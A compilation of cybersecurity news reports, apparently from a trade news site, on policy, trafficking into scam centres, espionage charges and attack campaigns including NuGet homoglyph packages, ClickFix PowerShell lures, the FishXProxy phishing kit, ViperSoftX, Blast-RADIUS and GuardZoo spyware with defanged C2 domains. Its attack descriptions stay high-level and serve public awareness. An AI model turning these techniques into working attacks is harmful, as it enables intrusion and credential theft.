The Philippines has observed an increased number of cyber attacks in recent times, prompting a call for increased government measures to strengthen the nation’s digital infrastructure to reduce such campaigns. A recent bill - House Bill 8199 - would implement the Department of Information and Communications Technology to bolster the Philippine National Cyber Security Plan, or NCSP. Rep. Brian Raymund Yamsuan pushed for approval within the House of Representatives for the new bill earlier this year. He stated, “This measure complements the NCSP and is a good jump-off point in accomplishing one of its primary objectives, which is to ensure convergence among all government agencies in protecting our country from cyber attacks.” Brian offered support for reports that the Philippines President Marcos, U.S. President Joe Biden and Japan Prime Minister Fumio Kishida were establishing joint plans to establish a cyber defense framework during an earlier trilateral summit. Several government agencies have also discussed measures to bolster their cybersecurity capabilities, including a unified system for setting up minimum security standards, monitoring of systems, and detection and mitigation of threats.

The Central Bureau of Investigation (CBI) of India has uncovered a large-scale human trafficking operation that has ensnared thousands of Indians in Southeast Asian countries to work in Chinese scam centers. According to a first information report(FIR) filed by the agency, victims are being forced to work as cyber criminals in these operations. Rajesh Kumar, CEO of the Indian Cyber Crime Coordination Centre, revealed that an average of 7,000 cyber-related complaints are registered daily with the National Cybercrime Reporting Portal. Most of these frauds originate in Cambodia, Myanmar and Laos.

Trafficking Scheme of Chinese Scam Centers

According to a recent report from The Indian Express, victims of these campaigns are lured in with promises of lucrative jobs in foreign countries such as Dubai and Bangkok, only to be trafficked to Southeast Asian countries. Once they arrive, they are forced to work in call centers or "casinos" where they are trained to scam people from around the world. One such victim, Saddam Sheikh from Maharashtra's Palghar district, was contacted via WhatsApp about a job opportunity in Thailand. After paying 140,000 rupees (approximately $1,700) for a visa, Sheikh was sent to Bangkok and then to Laos. He was forced to scam people in India, Canada and the United States by promoting fraudulent cryptocurrency investments online. Sheikh eventually managed to escape and return to India. Similar cases have been reported in other parts of Southeast Asia. Martha Praveen, who fled a scam operation in Cambodia, claimed he was among 5,000 Indians working in a call center run by Chinese gangs. Praveen was initially offered a job in Azerbaijan but was instead sent to Cambodia. Upon arrival, his passport was confiscated, and he was taken to a large office complex housing multiple call centers disguised as casinos.

Government Response and Investigation

The CBI filed its case after consulting with the home ministry, telecom ministry and Reserve Bank of India. These institutions were tasked with identifying and addressing vulnerabilities in the banking and telecom sectors that enable such scams. The Telangana Cyber Security Bureau has also filed a similar report based on Praveen's complaint. The victims were reportedly involved in scamming people by offering fraudulent trading, investment and job opportunities, primarily targeting Indians, Europeans and Turkish nationals. As investigations continue, authorities are working to dismantle these criminal networks and prevent further exploitation of Indian citizens. The scale of the operation highlights the need for increased vigilance and cooperation between international law enforcement agencies to combat human trafficking and cyber crime. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A sophisticated malware campaign targeting the NuGet package manager has been uncovered by  researchers. The ongoing attack, which began in August 2023, has evolved to employ advanced techniques like homoglyphs and IL weaving to evade detection and fool developers. NuGet is a Microsoft-supported mechanism for sharing to allow developers to create, share, and consume .NET (including .NET Core code. The threat actors have refined their methods over time, moving from simple initialization scripts to more complex approaches to impersonate protected NuGet prefixes to inject malicious code into legitimate .NET binaries.

Homoglyph Attacks Bypass Security Measures

Researchers from ReversingLabs observed, that in a a clever twist, attackers had exploited NuGet's support for homoglyphs to circumvent the platform's prefix reservation system. By using visually identical but technically distinct characters, they created package names that appeared legitimate but weren't subject to the usual restrictions. [caption id="attachment_81691" align="alignnone" width="2772"] Source: www.reversinglabs.com[/caption] One of the most notable techniques used in this campaign is the use of homoglyphs, unique characters that look identical but have different digital identifiers. The attackers used homoglyphs to create a package that convincingly mimics those that use the reserved "Guna" prefix, a security feature of NuGet. For example, the malicious package "Gսոa.UI3.Wіnfօrms" used Armenian and Cyrillic characters to mimic the  "Guna" prefix, allowed the attackers to publish packages that looked official but contained malicious code. The campaign's latest phase employs IL weaving, a technique that modifies compiled .NET binaries. Attackers patch legitimate DLL files to include malicious module initializers, which execute when the module is first loaded. This approach makes detection more challenging, as the malicious code is embedded within otherwise legitimate binaries. The injected code typically functions as a downloader, retrieving additional malware from attacker-controlled servers. [caption id="attachment_81693" align="alignnone" width="900"] Source: www.reversinglabs.com[/caption] Researchers identified approximately 60 packages and 290 versions involved in this campaign. While the affected packages have been removed from NuGet, the evolving nature of the attack underscores the need for heightened vigilance in the software supply chain.

Evolved Tactics

The threat actors behind this campaign have continually refined their tactics, evolving from exploiting NuGet's MSBuild integrations to using simple, obfuscated downloaders inserted into legitimate PE binary files via IL weaving. This technique allows them to add malicious functionality to compiled .NET binaries, making it harder to detect. The detection of these malicious packages is challenging due to the use of homoglyphs and IL weaving. Traditional detection methods, such as YARA, may not be effective in identifying these threats. However, behavioral analysis can help identify suspicious packages and indicators of compromise. This latest campaign highlights the importance of staying ahead of malicious actors and their evolving tactics. The use of homoglyphs and IL weaving demonstrates the creativity and determination of attackers to deceive developers and security teams. It is crucial for development organizations to prioritize software supply chain security and stay informed about emerging threats. Researchers have shared potential Indicators of Compromise (IOCs) for this campaign to NuGet administrators, with identified packages removed from the platform. It is essential for developers to remain vigilant and report any suspicious packages to ensure the security of the software supply chain.

A sophisticated malvertising campaign is targeting Mac users searching for Microsoft Teams, highlighting the growing competition among malware creators in the macOS ecosystem. This latest attack, which uses Atomic Stealer malware, which follows closely on the heels of the Poseidon (OSX.RodStealer) project, indicates growing advancements in threats affecting macOS.

Deceptive Microsoft Teams for macOS Ad Campaign

The malicious ad campaign, which ran for several days, employed advanced filtering techniques to evade detection. Appearing as a top search result for Microsoft Teams, the ad displayed microsoft.com as its URL but actually redirected users through a series of deceptive links. The ad was likely paid for by a compromised Google ad account. Initially, the ad redirected straight to Microsoft's website, but after multiple attempts and tweaks, a full attack chain was finally observed. [caption id="attachment_81644" align="alignnone" width="970"] Source: malwarebytes.com[/caption] Researchers from Malwarebytes stated that upon clicking the ad, users were subjected to a profiling process to ensure only actual people proceeded. This could help the malicious site evade detection from automated security tools and scans. A cloaking domain then separated the initial redirect from the malicious landing page, which mimicked the design of the official Microsoft Teams download site. The ad was found to be malicious, with a display URL showing Microsoft.com, but actually leading to a fake installation page. The advertiser, located in Hong Kong, runs over a thousand unrelated ads. Upon further investigation, it was discovered that the ad was using a unique payload for each visitor, generated from a domain called locallyhyped.com. [caption id="attachment_81645" align="alignnone" width="1164"] Source: malwarebytes.com[/caption] Once the downloaded file was opened, the user was instructed to enter their password and grant access to the file system, allowing the malicious application to steal keychain passwords and important files. Following data theft, the data was exfiltrated via a single POST request to a remote attacker-controlled web server.

Mitigations for macOS Devices

To avoid falling victim to such attacks, researchers advised caution while downloading applications via search engines. Malvertising and SEO poisoning attacks can have devastating consequences, and it's crucial to use browser protection tools with the ability to block ads and malicious websites. Additionally, it's recommended to regularly update antivirus software and use a reputable ad blocker to minimize the risk of malware infection. [caption id="attachment_81655" align="alignnone" width="752"] Source: Cyble[/caption] This campaign underscores the increasing sophistication of macOS malware due to the keen interest demonstrated by threat actors in compromising the operating system's environment. Last year, researchers from Cyble Research and Intelligence Labs (CRIL) observed that the Atomic Stealer used in this campaign, had been offered via Telegram at the price of $1000 USD per month.

Australian authorities have charged a Russian-born couple with espionage in a operation referred to as 'Operation BURGAZADA', which the first use of new anti-espionage laws introduced in 2018. Kira Korolev, 40, a private in the Australian Army, and her husband Igor Korolev, 62, a laborer, face allegations of stealing sensitive Defense Force material for Russian intelligence. The couple, who arrived in Australia a decade ago and became citizens in recent years, appeared before a Brisbane magistrate on Friday. They could face up to 15 years in prison if convicted. The case has raised questions about the screening process for military recruits and the ongoing threat of foreign espionage.

Operation BURGAZADA Investigation

The AFP's investigation into the couple's activities is ongoing, with authorities seeking to determine whether the information was handed over to Russian authorities. Australian Security Intelligence Organisation (ASIO) director-general Mike Burgess has warned foreign spies that "when we can support a prosecution, we will support a prosecution. [caption id="attachment_81624" align="alignnone" width="1324"] Press-conference in relation to the investigation (Source: spaces.hightail.com)[/caption] Barrister Dylan Kerr, a commissioner from the Australian Federal Police, filed an application for the suppression of five names related to the case for national security reasons. The Defence Force has responded to these allegations by cancelling the couple's access to defence bases and systems. Court documents reveal that Kira Korolev is accused of providing unlawful access to defense computer systems, copying and disseminating information, and maintaining relationships with Russian Federation intelligence services. The alleged activities date back to December 2022 and continued until their arrest on July 11, 2024. Australian Federal Police Commissioner Reece Kershaw said Kira Korolev, an information systems technician with a security clearance, allegedly traveled to Russia in 2023 while on leave. During this time, she reportedly instructed her husband on accessing defense systems using her work account from their Brisbane home. A caretaker of the apartment block where the couple resided, Blake Fraser, stated that he had not noticed any suspicious activity from the couple. He stated, “I kept my eye out for anything unusual, but honestly, even being here on-site, I never saw anything.” He said that he only received his first hint that something was off when the apartment had received a request from ASIO and the AFP to access its F block, later being greeted by police cars and officers who arrived to arrest the couple. “I certainly wouldn’t think that in my lifetime something like this would have happened,” Fraser exclaimed.

Official Response and Implications

The arrests resulted from a joint operation involving the Australian Security Intelligence Organisation (ASIO) and the Australian Federal Police. ASIO Director-General Mike Burgess stated that the Defense Force's security awareness allowed early intervention and control of the operation. Authorities are investigating whether Kira Korolev joined the Defense Force with the intention of committing espionage or if the couple had been recruited more recently into Russian intelligence. The case has prompted a review of vetting procedures for military personnel, especially those born overseas. While officials claim no significant security compromise has been identified, the incident highlights the ongoing challenges of countering foreign espionage. Mike Burgess, Director-General of the Australian Security Intelligence Organisation encouraged potential Russian spies to defect and share secrets, using the famous example of the 1954 Petrov defections, where  Soviet spies who posed as Russian diplomats had defected to Australia. Burgess stated, “If you want to share your secrets, please reach out”. [caption id="attachment_81629" align="alignnone" width="980"] Vladimir Petrov and Evdokia Petrov who defected to Australia in 1954 (Source:www.naa.gov.au)[/caption] The Federal Police Commissioner Kershaw stated that no other individuals had been identified so far in the investigation, while investigators are also working to assess if the couple had established any rapport with any Russian diplomats based in Australia. Court documents allege the couple maintained a relationship with members or affiliates of Russian intelligence services for the purpose of providing the information. Kershaw expressed confidence in the counter-intelligence capability of the Australian government and the Five Eyes. He stated:

“Our Five Eyes partners and the Australian government can be confident that the robust partnerships within the Counter Foreign Interference Taskforce mean we will continue to identify and disrupt espionage and foreign interference activity.”

Prime Minister Anthony Albanese emphasized that any individuals interfering with Australia's national interests will be held accountable.

Researchers have discovered a new have a new weapon on the dark web markets: FishXProxy, a sophisticated phishing toolkit that's making waves in the underground hacking community. This powerful software package enables even novice attackers to create convincing phishing campaigns, potentially putting countless internet users at risk. FishXProxy bills itself as "The Ultimate Powerful Phishing Toolkit," and while its creators claim it's for educational purposes only, its features cater to malicious use. The kit provides an end-to-end solution for creating and managing phishing sites, focusing on evading detection and maximizing credential theft success rates.

FishXProxy Phishing Kit

At the heart of the new FishXProxy phishing kit is its multi-layered antibot system. These layers prevent automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. [caption id="attachment_81577" align="alignnone" width="646"] Source: slashnext.com/[/caption] Options within the toolkit range from simple challenges, uniquely generated links, dynamic attachments, and even the use of Cloudflare's CAPTCHA system as antibot implementations. Researchers from SlashNext state that the kit's deep integration with Cloudflare provides phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes using Cloudflare Workers, SSL certificates, and DNS management, raising the bar for detection and takedown efforts. [caption id="attachment_81588" align="alignnone" width="547"] Source: slashnext.com[/caption] FishXProxy implements a cookie-based tracking system that allows attackers to identify and follow users across different phishing projects or campaigns. This enables more targeted and persistent attacks, as well as the ability to build detailed profiles of potential victims. These tools help attackers manage their campaigns more effectively while making it harder for security teams to analyze and shut down malicious infrastructure. The kit provides several end-to-end functionalities to maximize the potency of phishing campaigns, some of these key features include:

• Advanced antibot system: This multi-layered system prevents automated scanners, security researchers, and potential victims from detecting the phishing nature of sites created with the kit. The antibot system offers several configuration options, including a Lite Challenge, Cloudflare Turnstile, IP/CAPTCHA Antibot, and Off option.
• Cloudflare integration: FishXProxy leverages Cloudflare's infrastructure to provide phishing operators with enterprise-grade infrastructure typically associated with legitimate web operations. This includes Cloudflare Workers, Cloudflare Turnstile, SSL Certificates, and DNS Management.
• Inbuilt redirector: This feature allows attackers to hide the true destination of links, distribute incoming traffic across multiple phishing pages or servers, and implement more complex traffic flows to evade detection.
• Page expiration settings: This feature allows attackers to automatically restrict access to phishing content after a specified duration, limiting exposure, creating urgency, and aiding campaign management.
• Cross-project user tracking: This feature allows attackers to identify and track users across different phishing projects or campaigns, enabling them to tailor phishing content based on previous interactions and avoid targeting the same user multiple times.

Impact of Phishing Kits on Cyber Ecosystem

The rise of FishXProxy and other phishing toolkits has significant implications for cybersecurity. These toolkits lower the technical barriers to conducting phishing campaigns, making it easier for less skilled individuals to conduct advanced phishing operations. This has the potential to increase the volume and sophistication of phishing attacks in the wild. These toolkits typically offer the following functionalities as implementations, that would be harder to develop from scratch:

• Automated installation and setup
• Built-in traffic encryption
• Free and automated SSL certificate provisioning
• Unlimited subdomain and random domain generation
• Browser security bypass techniques
• Real-time monitoring and notifications via Telegram
• Comprehensive traffic analysis tools

The FishXProxy additionally offers 'lifetime updates + support,' treating the sale of the toolkit as a long-term service provision rather than a one-off attack or single sale bid. To combat these threats, companies should invest in advanced, multi-layered security solutions that offer real-time threat detection across email, web, and mobile channels. Organizations should also prioritize employee education on the latest phishing tactics and implement strong authentication measures to protect against credential theft attempts.

Researchers have uncovered a malware delivery method dubbed "ClickFix," which exploits user trust through compromised websites to deliver DakGate and Lumma Stealer malware variants. The ClickFix technique uses social engineering to trick users into executing malicious scripts, potentially leading to severe system compromise of affected systems. These sites redirect visitors to domains hosting fake popup windows, which instruct users to paste a script into a PowerShell terminal.

ClickFix Social Engineering Infection Chain

After visitors are redirected from seemingly-legitimate sites, instructions are displayed to deceive them into pasting various base64-encoded commands into a PowerShell terminal. Researchers from McAfee Labs stated that these commands are designed to download and execute malware, from remote attacker-controlled C2 servers. [caption id="attachment_81515" align="aligncenter" width="471"] Prevalence over past three months (Source: mcafee.com)[/caption] The ClickFix social engineering technique showcases a highly effective and technical method for malware deployment. Once the malware is active on the system, the malware typically includes steps to evade security detections such as clearing clipboard contents and running processes on minimized windows, maintain persistence on victim's systems, and stealing users’ personal data to send to a command and control (C2) server. The researchers have detailed the use of the ClickFix technique by the DarkGate and Lumma Stealer malware:

• DarkGate DarkGate is a malware family that relies on the ClickFix technique. The DarkGate malware is distributed through phishing emails that contain HTML attachments masqueraded as MS Office Word document files. After a user accesses the attachment, the HTML file displays a "How to fix" button, that upon clicking displays base64-encoded commands which hide malicious PowerShell instructions. [caption id="attachment_81519" align="aligncenter" width="626"] Source: mcafee.com[/caption] Upon running, the PowerShell commands downloads and executes an additional HTA file that contains additional malicious payloads. Once infected, the malware is capable of exfiltrating sensitive information and providing unauthorized remote access to threat actors.
• Lumma Stealer [caption id="attachment_81520" align="aligncenter" width="581"] Source: mcafee.com[/caption] While the Lumma Stealer is distributed through similar use of the ClickFix technique, visitors are usually greeted directly with a webpage displaying error message such as supposed browser problems, and are apparently provided instructions to 'fix' the issue. These instructions trick users to similarly enter base64-encoded commands into a PowerShell terminal that run the Lumma Stealer malware upon execution. This allows the stealer to bypass traditional security measures while compromising affected systems.

Mitigations and Remediations

To protect against the ClickFix technique and malware such as DarkGate and Lumma stealer, the researchers have shared the following recommendations:

• Regular training to inform potential victims about about social engineering tactics or phishing campaigns.
• Use of antivirus software on system endpoints.
• Implementation of a robust email or website filtering system to block suspicious phishing mails, malicious attachments or malicious websites.
• Deployment of firewalls and intrusion detection/prevention systems (IDS/IPS) to block against  malicious traffic on networks.
• Network segmentation to prevent the spread of malware within organizations.
• Monitoring of network logs and traffic
• Enforcement of the principle of least privilege (PoLP).
• Implementation of security policies or monitoring over clipboard content, particularly in sensitive environments.
• Implementation of multi-factor authentication (MFA).
• Update operating systems, software, and applications to the latest available patched versions.
• Encrypt stored data or data in transmission from potential unauthorized access.
• Regular and secure back up of important data

Vyacheslav Igorevich Penchukov, a Ukrainian hacker known as "Tank" has been sentenced to two concurrent 9-year prison terms by a U.S. federal court in Lincoln, Nebraska. for his role in a prolific cybercrime gang that stole tens of millions of dollars from small businesses. The 38 year-old individual, pleaded guilty to two charges of conspiracy to participate in racketeering and conspiracy to commit wire fraud. Judge John M. Gerrard sentenced also ordered him to pay more than $73 million in restitution and forfeited funds for these crimes.

'Tank' and JabberZeus Crew

Penchukov admitted to leading the Jabber Zeus hacking group, which used sophisticated malware to steal bank account information from small U.S. and European businesses. The group's operations, which began in 2009, resulted in tens of millions of dollars in losses. The FBI had been pursuing Penchukov for over a decade, and his capture in Switzerland in 2022 brought an end to his criminal spree. While leading the Jabber Zeus hacking cew, 'Tank' used the Zeus malware to infect computers and steal bank account information. He also organized the IcedID malware, which collected financial details and allowed ransomware to be deployed on systems. Investigators found a spreadsheet detailing the $19.9 million income IcedID made in 2021. The University of Vermont Medical Center was among the prominent victims of the IcedID malware, losing of over $30 million in the attack and rendering many of the critical patient services within the the institute as unavailable for more than two weeks. Penchukov had been charged in association with the attack by the law enforcement of the Eastern District of North Carolina. In response to the incident, U.S. Attorney Michael Easley for the Eastern District of North Carolina stated, “Malware like IcedID bleeds billions from the American economy and puts our critical infrastructure and national security at risk.” Last September, Dr. Stephen Leffler, President of the University of Vermont Medical Center had testified to the House of Representatives that the center was unable to access its own medical records for 28 days due to the incident. Dr. Leffler stated, “We didn’t have internet.” He added. "We didn’t have phones. It impacted radiology imaging, laboratory results." According to Dr. Leffler's testimony, the medical center's staff had rushed to purchase walkie-talkies to keep services running. Penchukov appeared on the FBI's most wanted cyber list for over a decade as the recognized leader of the cybercrime gang. Earlier, prosecutors had stated in court, “The defendant played a crucial role, a leadership role, in this scheme by directing and coordinating the exchange of stolen banking credentials and money mules." Jim Craig, a former FBI special agent who led the 2009 investigation into the Zeus cybercriminal group, expressed satisfaction with the outcome. Craig stated, "I never thought that we would ever see any of Jabber Zeus crew face justice in the U.S." Besides his involvement in cybercrime, Penchukov had also been identified as a popular DJ, who operated within Ukraine under the moniker of 'DJ Slava Rich.'

Implications of Ruling

The prosecution of Penchukov represents a significant milestone in the fight against high-value cybercrime targets and the persistence of law enforcements against international jurisdictional challenges. The Western law enforcement authorities are known to face challenges in prosecuting Eastern European cybercriminals, particularly those operating out of Russia or Ukraine, which do not have official extradition agreements with the US government. Craig pointed out, "The significance of him being caught is important to show that law enforcement is not going to stop—wherever they go, there's going to be a chance and opportunity for them to get caught." The case also raises questions about potential cooperation between Penchukov and authorities to aid ongoing cybercrime investigations, according to court documents both Penchukov's own lawyer and the US government requested less severe sentences after he had pleaded guilty to two charges of conspiring to participate in racketeering and commitment of wire fraud. Several charges were dropped against Penchukov following his signing of a plea agreement of which the details are publicly unknown.

A threat actor group dubbed 'CRYSTALRAY' has dramatically scaled up its attack operations, targeting over 1,500 victims worldwide with a sophisticated arsenal of open-source security tools. Researchers first observed the group's activities in in February 2024 and have been observing its evolving tactics. The group's primary goals appear to be credential theft, cryptomining and maintaining persistent long-term access to compromised systems. The group's tactics reflect a concerning trend of weaponization of legitimate open-source security tools by threat actor groups for malicious intent and illicit  financial gain.

CRYSTALRAY Reconnaissance and Initial Access

Researchers from Sysdig observed that the group had significantly scaled up its operations, to target over targeting over 1,500 victims with the abuse of a wide range of legitimate open-source security tools to exploit known vulnerabilities and deploy backdoors. CRYSTALRAY's attack chain begins with careful reconnaissance of potential victims, the group uses tools from ProjectDiscovery, an open-source organization, to identify targets. CRYSTALRAY's arsenal of tools includes zmap, asn, httpx, nuclei, platypus, and SSH-Snake. To gain initial access, the group often modifies existing proof-of-concept exploits for known vulnerabilities, testing them before deployment against real-world targets. These operations tend to focus on specific countries, with the United States and China accounting for over half of their observed victims. [caption id="attachment_81431" align="alignnone" width="1999"] Chart of targeted countries (Source: sysdig.com)[/caption] The attackers employ a tool called "ASN" to generate lists of specific IP addresses for targeted countries. They then use "zmap," a network scanner, to probe these IPs for vulnerabilities ripe for exploit in commonly-used platforms such as Confluence, Weblogic and ActiveMQ. The httpx module is used to verify the presence of vulnerable running services with a httpx_output.txt file generated to filter invalid results. Nuclei is then used to perform vulnerability scans, identifying CVEs such as CVE-2022-44877 (Arbitrary command execution flaw), CVE-2021-3129(Another Arbitrary code execution flaw), and CVE-2019-18394 (Server-side request forgery).

Lateral Movement, Data Theft and Crypto-Mining

After breaching a system, CRYSTALRAY focuses on lateral movement and data collection. A key tool in their arsenal is SSH-Snake, an open-source worm that spreads through networks using stolen SSH credentials. [caption id="attachment_81432" align="alignnone" width="1999"] Source: sysdig.com[/caption] The group moves beyond server access and compromise, to search for credentials such as passwords or API keys of popular cloud providers stored as environment variables in files such as .env configurations, potentially allowing them to expand their reach into victims' cloud infrastructure. The group automates the SSH-Snake tool to extract and exfiltrate credential data back to attacker-ownerd command-and-control servers. Ultimately, the group deploys cryptominers on breached systems by hijacking the host's processing power, with a script killing any existing cryptominers to maximize profit. While the researchers traced these deployed mining workers to a specific pool and discovered they were making roughly $200/month, starting in April, the group switched to a new configuration, making it impossible for the researchers to determine its current revenue. Researchers have offered the following recommendations to protect against these attacks:

•  Reduce potential cloud attack surface through secure vulnerability, identity, and secrets management to prevent automated attacks.
• Organizations required to expose applications to the public Internet, may face additional vulnerabilities and therefore should  prioritize vulnerability remediation to reduce their risk of exposure
•  Cameras/runtime detections that enable organizations to detect successful attacks and take immediate remediate action, allowing for in-depth forensic analysis to determine root cause of attacks.

The scale and sophistication of CRYSTALRAY's operations highlight the growing threat posed by cybercriminals leveraging open-source security tools.

Researchers have observed improvements in the ViperSoftX info-stealing malware that had been first spotted in 2020. The malware has moved toward employing more sophisticated evasion tactics, refined through the incorporation of the Common Language Runtime (CLR) to run PowerShell commands within AutoIt scripts distributed through pirated eBook copies. This clever trick allows the malware to blend in with legitimate system activities, making it harder for security solutions to spot.

ViperSoftX Distributed as Trojan Horse in eBooks

[caption id="attachment_81267" align="alignnone" width="1932"] Source: www.trellix.com[/caption] ViperSoftX spreads through torrent sites, masquerading as eBooks. The infection chain of ViperSoftX begins when users access the downloaded RAR archive that includes a hidden folder, a deceptive shortcut file  that appears to be a harmless PDF or eBook along with a PowerShell script, AutoIt.exe, and AutoIt script that pose as simple JPG image files. [caption id="attachment_81268" align="alignnone" width="1200"] Source: www.trellix.com[/caption] When the user clicks on the shortcut file, it initiates a command sequence that begins by listing the contents of "zz1Cover4.jpg". Subsequently, it reads each line from this file in which commands are cleverly hidden within blank spaces, to a Powershell Command Prompt, effectively automating the execution of multiple commands. The researchers from Trellix state that the PowerShell code performs several actions, including unhiding the hidden folder, calculating the total size of all disk drives, and configuring Windows Task Scheduler to run AutoIt3.exe every five minutes after the user logs in, effectively setting up persistence mechanisms on infected systems. The malware also copies two files to the %APPDATA%MicrosoftWindows directory, renaming one of them to .au3 and the other to AutoIt3.exe.

Increasing ViperSoftX Sophistication

The malware's use of CLR to run PowerShell within AutoIt is particularly sneaky. AutoIt, typically used for automating Windows tasks, is often trusted by security software. By piggybacking on this trust, ViperSoftX can fly under the radar. The malware employs additional tricks up its sleeve in the form of heavy obfuscation, deception and encryption to hide its true nature. ViperSoftX uses heavy Base64 obfuscation and AES encryption to hide the commands in the PowerShell scripts extracted from the image decoy files. This level of obfuscation challenges both researchers and analysis tools, making it even more difficult to decipher the malware's functionality and intent. The malware even attempts to modify the Antimalware Scan Interface (AMSI) to bypass security checks run against its scripts. By leveraging existing scripts, the malware developers accelerate development and focus on improving their evasion tactics, Analysis of the malware's network activity demonstrates attempts to blend traffic with legitimate system activity. Researchers observed the use of deceptive hostnames such as security-microsoft[.]com by the malware to appear more trustworthy and deceive victims into associating the traffic activity with with Microsoft. Analysis of a suspicious Base64-encoded User-Agent string, revealed detailed amount of system information extracted through PowerShell command execution from infected systems including logical disk volume serial number, computer name, username, operating system version, antivirus product information, and cryptocurrency details. The researchers warn against the increasing sophistication in ViperSoftX's operations as its ability to execute malicious functions while evading traditional security measures makes it a formidable opponent.

A critical vulnerability in the widely used RADIUS authentication protocol could allow attackers to gain unauthorized access to networks and devices, researchers have discovered. The flaw, dubbed "Blast-RADIUS," affects a protocol that has functioned as a cornerstone of modern network infrastructure. RADIUS, which stands for Remote Authentication Dial-In User Service, is used by nearly every switch, router, access point and VPN concentrator sold in the last 20 years. It verifies user credentials for remote access to networked devices. including network routers and switches, industrial control systems, VPNs, ISPs using DSL or FTTH, 2G and 3G cellular roaming, and 5G DNN authentication

The Blast-RADIUS Attack

Researchers from several universities along with some private firms discovered that a man-in-the-middle attacker could exploit a weakness in how the RADIUS protocol authenticates server responses. By injecting malicious data into a legitimate authentication request, an attacker can forge a valid "Access-Accept" message in response to a failed login attempt. [caption id="attachment_81227" align="alignnone" width="2391"] Source: blastradius.fail[/caption] This allows the attacker to transform a reject into an accept, and assign themselves arbitrary network privileges. The attack is made by the abuse of the MD5 hash function, which has been known to be vulnerable to chosen-prefix collisions. The attacker can use this collision to create a modified Response Authenticator that matches the authentic one generated by the server, without requiring any knowledge of the shared secret between the client and server. [caption id="attachment_81242" align="alignnone" width="1977"] Source: blastradius.fail[/caption] While MD5 hash collisions have been known since 2004, the researchers state that their attack technique is much more complex than older forms of MD5 collision attacks. Further, MD5 collision was not previously thought of as a possible way to exploit the RADIUS protocol. The new attack technique requires the use of the internet, with the attacker having to compute for the chosen-prefix MD5 collision attack in a matter of mere minutes or seconds. The researchers state that the best previously reported chosen-prefix collision attack typically took hours of operation to produce, collisions that were not found to be compatible with the RADIUS protocol. The researchers' Blast-RADIUS attack technique incorporates several improvements in speed, space, and scaling ahead of existing MD5 attacks, demonstrating that they can occur in shorter intervals to compromise the popular RADIUS protocol. While the proof-of-concept attacks described in the paper took about 3 to 6 minutes for MD5 chosen-prefix hash collision computation, longer than the 30- to 60-second timeouts commonly used in practice for RADIUS, each step of the new collision algorithm parallelizes rather well and allows for further hardware optimization. The researchers expect that a well-resourced attacker could obtain computational processing times tens or hundreds of times faster by running the attack on better GPUs, FPGAs, or other optimal hardware. The Blast-RADIUS attack technique affects all known RADIUS implementations that use non-EAP authentication methods over UDP, including the common FreeRADIUS implementation. The researchers disclosed details of the vulnerability to the IETF (Internet Engineering Task Force) and CERT( Computer Emergency Readiness Team) and expect patches for mitigations in the Message-Authenticator specifications from major implementations of the RADIUS protocol.

RADIUS Mitigation and Future Outlook

The IETF RADEXT working group is said to be working on pushing for the standardization of the RADIUS protocol as more secure alternative, which the researchers state would help mitigate against the Blast-RADIUS vulnerability. While the researchers note that major RADIUS implementations are working on releasing various patches to mitigate the vulnerability, they said the attack demonstrates the need to scrap and move away from the aging protocol entirely. In the meantime, the researchers urge system administrators to check with vendors for possible patches against the vulnerability and to follow best practices for secure RADIUS configuration. The Blast-RADIUS attack serves as a reminder that even long-standing protocols can harbor critical flaws. The research demonstrates that as networks deployments grow more complex, there must be continued scrutiny of these technologies to maintain security.

Cybersecurity researchers observed an Android surveillance campaign active since October 2019 that has targeted the military personnel of various countries in the Middle East. The researchers believe the operation has ties to a Houthi-aligned threat actor. Referred to as "GuardZoo," the spyware has infected devices belonging to more than 450 victims. The campaign remains active with researchers still analyzing related activity.

GuardZoo Infection of Middle Eastern Military Targets

GuardZoo is based on Dendroid RAT, an underground RAT program available for purchase at $300 that also included a binding utility to infect legitimate programs that had been leaked online in 2014. Researchers noted many modifications to the original source code to implement additional capabilities while removing some unused functions. The GuardZoo malware uses a new C2 backend created with ASP.NET. instead of relying on the native Dendroid RAT's PHP web panel for remote Command and Control (C2). The researchers from Lookout attribute the campaign to a Yemeni, Houthi-aligned threat actor based on the application lures, exfiltrated data, targeting, and the C2 infrastructure location. The campaign has been observed to primarily target victims in Yemen, Saudi Arabia, Egypt, Oman, the UAE, Qatar, and Turkey. [caption id="attachment_81170" align="alignnone" width="314"] Source: www.lookout.com[/caption] [caption id="attachment_81169" align="alignnone" width="896"] Source: www.lookout.com[/caption] The researchers observed the use of two C2 addresses, the first of which functioned as the primary address - https://wwwgoogl.zapto[.]org - and the second as a backup address: https://somrasdc.ddns[.]net. The malware is able to receive over 60 different commands from these C2 servers. These commands are mostly exclusive implementations to Guardzoo. The researchers compiled a list of some of the most notable C2 commands and their respective functions: [caption id="attachment_81175" align="alignnone" width="446"] Source: www.lookout.com[/caption] GuardZoo can collect a wide range of data from infected devices, including photos, documents, location data, saved GPS routes and tracks, device model number, mobile carrier, and Wi-Fi configuration. Moreover, it can enable the actor to deploy additional invasive malware on the infected device. The device's location, model, and cellular service carrier can also be collected. The surveillanceware is distributed via WhatsApp, WhatsApp Business, and direct browser download, and uses military themes to lure victims. Lookout researchers have observed recent samples of GuardZoo posing as religious, e-book, and military-themed apps, such as 'The Holy Quran,' 'Constitution of the Armed Forces,' 'Limited - Commander and Staff,' and 'Restructuring of the New Armed Forces.' [caption id="attachment_81186" align="alignnone" width="1274"] Source: www.lookout.com[/caption]

Researchers Trace Houthi Connection

Researchers found evidence linking GuardZoo to Yemen's Houthi militia, which the U.S. government recently redesignated as a global terrorist group. Analysis of server logs revealed that many of the identified victims appeared to be members of the pro-Hadi forces in Yemen. Additionally, the malware's C2 servers were found to be hosted on YemenNet infrastructure belonging to an ISP that is state-owned by the Yemeni government. Researchers noted that some of the log entries indicated that the devices belonged forces aligned with President Hadi's government that operates from Aden. One of the exfiltrated documents contained phrases that translated to “Very Confidential, Republic of Yemen, Ministry of Defense, Chief of the General Staff, War Operations Department, Insurance division.“

Protection Against GuardZoo

Aaron Cockerill, Executive Vice President of Product & Security at the security firm, stated, “These spyware packages can be used to collect a wide range of data from infected devices, which in the case of GuardZoo, could put military personnel and operations at risk. We urge security professionals to be aware of this threat and to take steps to protect their users, and work and personal data.” To protect both business and personal Android devices from GuardZoo and other surveillanceware, the researchers have recommended the following basic steps:

• Keep your operating system and apps up to date, as most updates nowadays are related to security patches.
